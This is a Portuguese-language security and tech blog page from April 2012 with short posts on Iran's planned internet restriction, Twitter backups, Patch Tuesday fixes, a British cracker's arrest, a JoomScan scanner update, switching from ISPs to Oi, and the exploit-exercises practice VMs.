quarta-feira, 11 de abril de 2012

Governo iraniano quer banir a internet do país.

Governo do país vai bloquear todos os acessos a páginas externas, fazendo com que apenas os sites iranianos possam ser acessados.


A grande maioria dos conteúdos que podemos encontrar na internet é originada em países ocidentais – o que inclui toda a América e também a Europa. Esses materiais produzidos não costumam agradar aos países com regimes totalitaristas, como é o caso da China e do Irã.

Este segundo, por exemplo, está seguindo os passos do primeiro (responsável por várias ações de censura da rede mundial de computadores) para banir a internet totalmente.

Isso mesmo, o governo iraniano vai cortar todo o acesso que as pessoas têm a sites de fora do Irã. Segundo mostrado pelo International Business Times (IBT), até agosto o país estará funcionando baseado em uma rede interna única – que deve funcionar como uma gigantesca intranet. Para acessá-la, os cidadãos vão precisar de um registro completo – e, provavelmente, vão ter todos os passos rastreados.

Com isso, os iranianos não terão mais acesso aos principais sites de notícias do mundo – e nem mesmo poderão utilizar os motores de busca Google ou Bing. Todos os sites passarão pelo crivo do governo para que possam ir ao ar. E, conforme relatado pelo IBT, toda a informação que chegará à população será baseada em informações do próprio Estado.




Ref: TecMundo

Faça backup de seus posts e seguidores do Twitter


Se você usa o Twitter de maneira profissional e precisa manter documentado tudo o que já enviou no microblog por questões de segurança ou simplesmente quer manter um histórico do que já produziu no microblog apenas por diversão, uma boa ideia é fazer um backup das postagens, seguidores e outros componentes. Como? Fácil! 

Existem diversos aplicativos e serviços gratuitos que fazem o trabalho. Um dos mais interessantes é o Twdocs, que permite salvar seus tweets, resultados de busca, mensagens diretas, menções e outros elementos em arquivos nos formatos PDF, DOC, XML, TXT, XLS e HTML.

O funcionamento é simples. Na página do aplicativo clique no item que deseja exportar abaixo do “I Want to Export“, selecione o formato do arquivo que deseja e cloque em “GO“. Na primeira vez que usar o serviço, você precisará informar suas credenciais de acesso ao Twitter.

Como o Twitter não armazena os dados de publicação por muito tempo, é bom você realizar cópias regulares dos seus dados caso necessite dos mesmos para algo posteriormente.
Lógico que existem outros sites que efetuam backups de seus dados no Twitter, mas são mais invasivos do que o Twdocs. Algumas boas opções são o Tweetbackup e o Backupify, este último com opções para fazer backup de outras redes sociais e e-mails.

Interessante mesmo seria se o Twitter disponibilizasse uma opção de restaurar estes backups depois. Aí sim o serviço de backup da rede social bombaria! Fica a dica galera do pássaro azul. 

segunda-feira, 9 de abril de 2012

Microsoft e Adobe: Solução para Falhas Críticas com o "Patch Tuesday"






Para essa próxima terça-feira, dia 10 de Abril, foi feita uma programação através de administradores e mantenedores de sistemas da Microsoft e Adobe, para emitir correções para vulnerabilidades críticas em seus produtos. A Microsoft diz que haverá quatro alertas importantes relativos ao Microsoft Windows, Internet Explorer, .NET Framework, Office, SQL Server, Microsoft Server e ferramentas de desenvolvedor. Todos esses produtos estão apresentando falhas, que podem levar a uma execução remota de código.


A vulnerabilidade em questão foi classificada como "relevante", devido a tratar-se de um problema de divulgação de informações no Microsoft's Forefront United Access Gateway. Os boletins relacionados a esses problemas críticos, afetarão todas as versões do Windows, a partir do Windows XP SP3 até o Windows Server 2008R2. Há também um boletim referenciando uma falha crítica para o Internet Explorer, que engloba as versões IE 6, 7, 8 e 9.

Na sequência desses ajustes, a Adobe diz que as correções de alta prioridade para Adobe Reader e Adobe Acrobat 9.5 e versões anteriores do 9.x para Windows, serão lançadas amanhã, dia 10 de Abril. A fabricante classifica com prioridade mais baixa, as correções que serão emitidas para as mesmas versões do Reader e do Acrobat no Macintosh, e para o Reader no Linux.

Cracker Utiliza Trojan para Acessar Contas do PayPal






Um jovem de apenas 23 anos de idade, de origem britânica, chamado Edward Pearson de York, utilizou trojans para ter acesso a cerca de 200.000 contas do PayPal. Devido à prática dessa atividade ilegal, o cracker foi preso e os investigadores que estão trabalhando no caso teriam encontrado com ele cerca de 2.700 cartões de crédito e débito, além de dados pessoais de mais de 8.000 cidadãos britânicos. Até o momento, não foi detalhada a forma como o jovem, conhecido como "G-Zero", conseguiu acessar essas informações confidenciais.


Os profissionais que estão trabalhando nas análises, investigações e perícia deste caso supõem que o cracker tenha usado bots pré-programados tais como SpyEye e ZeuS, além do desenvolvimento de seus próprios scripts em Python. "G-Zero" também pode ter se infiltrado em redes corporativas da Nokia e ter ganho acesso aos detalhes pessoais de mais de 8.000 funcionários, além de conseguir acesso e roubar dados de funcionários da AOL.
 
Devido as ocorrências, a polícia estima que ele pode ter feito mais de £ 800.000 com os dados que foram apreendidos, mas Edward foi "modesto", afirmando que só embolsou £ 2.351. De acordo com o que foi veiculado pelo Daily Mail Online, o jovem só estava interessado no "desafio intelectual". A imprensa relatou que o jovem cibercriminoso recebeu uma sentença de prisão de 26 meses.


JoomScan 4.4.2012 Security Scanner - 623 Vulnerabilidades adicionadas


Equipe de Segurança Web-Center apenas lançado uma actualização para Joomscan Security Scanner. O novo banco de dados possui 623 vulnerabilidades.


Joomla! é provavelmente o CMS mais usado lá fora, devido à sua flexibilidade, friendlinesss usuário, extensibilidade para citar. Observando as suas vulnerabilidades e adicionando essas vulnerabilidades como KB para Joomla scanner tem activity.It irá ajudar desenvolvedores web e web masters para ajudar a identificar possíveis falhas de segurança em seu Joomla implantado! locais. 
Verifique se há novas atualizações com o comando:

. / Joomscan.pl ou check / joomscan.pl atualização.. 
A regularmente atualizado o scanner baseado em assinatura, que pode detectar inclusão de arquivos, sql injection, execução de comandos, XSS, DOS, vulnerabilidades de passagem de diretório de um alvo Joomla! Web site. 
  
Download para Windows: JoomScan.rar


Transferir para Linux:  JoomScan.tar.gz

Diga adeus aos provedores de internet

Muita gente não sabe mas em alguns estados já é possível usar a internet sem ter que pagar provedor de acesso.

Na prática se sabe que os provedores nada mais fazem que interceptar seu acesso ao serviço de internet oferecido pela operadora (OI).

No início dos anos 90 a internet passou a ser implantada no Brasil, no começo só era possível graças à conexão via telefone (chamada conexão discada), numa velocidade mais/menos de 56Kbps, e com isso muitos provedores passaram a intermediar o serviço, ou seja, abria-se uma empresa, contratava o serviço da (na época) Brasil Telecom e através desse contrato terceirizava-se a conexão, isto porque alguém descobriu que a operadora não poderia ou não teria capacidade de oferecer e administrar o serviço.

Já no final de 1990 a ADSL substituiu a conexão discada, que impedia que a linha telefone fosse usada enquanto navegasse, e desde então temos essa ADSL ruim como sempre…

Mas para não quebrar os empresas que ofereciam o serviço de provedor de acesso, o governo passou a exigir que a conexão fosse autenticada mediante um serviço de algum provedor (ex: UOL, IG, etc)…

Saiba mais da história da internet no Brasil nesse artigo.

Mas como ia acontecer mais cedo ou mais tarde…

Agora a OI pode oferecer o modem e o serviço de provedor, daí ao invés de autenticar no seu modem de acesso usuario@uol.com.br, você pode usar ddd+nr.telefone@oi e a senha é os 5 primeiros dígitos do CPF do titular da linha telefônica.

A OI ainda oferece o modem conjugado sem fio (Roteador+Ponto de acesso wireless).

Para se livrar de vez do provedor, ligue na operadora (103+(DDD)) solicite seu login e senha de acesso, depois ligue para o provedor e cancele sua conta.
Não se esqueça de cancelar, pois simplesmente cadastrar seu acesso no modem não significa cancelar seu contrato com o provedor.


Ref:   Veia Digital

exploit-exercises.com – Desafio Hacker

O exploit-exercises, trás uma série de máquinas virtuais preparadas para o pessoal colocar em prática os seus conhecimentos de exploração de vulnerabilidades.
 
Inicialmente foram criados 3 tipos de ambientes para serem explorados, são eles:


O download destes ambientes poderá ser feito no link que se encontra no fianl do post, e vejam que há níveis, iguais aos dos jogos que estamos acostumados, quanto maior o nível, mais difícil é a solução.
Excelente iniciativa e oportunidade de aprendizado.

Pagina de DownloadExploit Exercises

Ref:   Coruja de Ti
 

SECURITY MASTER Copyright © 2011 -- Template created by Security Master -- Powered by Blogger